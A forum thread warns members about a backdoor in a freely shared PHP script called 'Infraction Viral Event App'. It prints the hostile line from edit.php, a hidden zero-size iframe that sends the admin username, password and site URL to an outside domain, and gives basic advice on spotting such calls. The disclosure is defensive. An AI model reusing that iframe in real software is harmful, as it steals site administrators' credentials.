[WARNING] Backdoor script was posted/shared here, members beware!

Status
Not open for further replies.

sam.hunt0710

Elite Member
Executive VIP
Jr. VIP
Joined
Jan 8, 2010
Messages
13,623
Reaction score
8,250
This is warning to all those who downloaded this script, shared by someone here,

Infraction Viral Event App

With file name

Infraction Viral Event App.zip

A fellow BHW member passed me a copy today and I had a look in the code and I found the code had a backdoor.

On line number 155, in edit.php file.

Code:
<iframe src="http://facecatch.info/index.php?adminu=<?php echo urlencode($adminu); ?>&adminp=<?php echo urlencode($adminp); ?>&url=<?php echo "http://" . $_SERVER['HTTP_HOST']  . $_SERVER['REQUEST_URI'];?>" width="0" height="0" frameborder="0">

So whoever owns this domian, has access to all the admin panels of the script on all servers it was installed.

He is pawning on your hardwork, so before he causes you more damage just delete the script if you have installed it and get it investigated by an expert before using it.

And learn your lesson that no one will give you free gold free of cost. The event app is a hot gold mine now so dont fall any trap and install anything you get and open backdoors on your servers.

Take Care Guys,
IndianBill007

PS: Apparently this file comes from this forum - http://*******VIP.COM
as per the note in the files.
 
Thanks for the heads up. I never use anything like this unless I check it througly; I downloaded this to test it later locally, so now I'll triple check it's behavior. I hope more people see this warning.
 
That's what you get for free shared shit! I got a hold of this one and showed it to IndianBill and he immediately found the threat. Not worth buying $50 scripts you guys, even free ( its not going to work ).. Stop wasting your time with this shit.. Spend some money and get some quality support and something that works!
 
thanks indianbill. any tips on how to scan scripts for that kind of stuff?
 
thanks indianbill. any tips on how to scan scripts for that kind of stuff?

Hi Angelas,

yes the best way to scan such scripts is install them on local and see if they are making calls to any back door server/domain.

I use this handy free tool

https://addons.mozilla.org/en-US/firefox/addon/httpfox/

make sure you close all your other browser windows so you dont get confused.

When you are inspecting, simply launch 1 browser window with the script in question, and open httpfox, if you dont see any calls made outside localhost, the script is clean.

However if you see it calling anything outside localhost, its backdoored.

Hope this helps.

I will post a step by step guide to scan scripts tomorrow may be.
 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top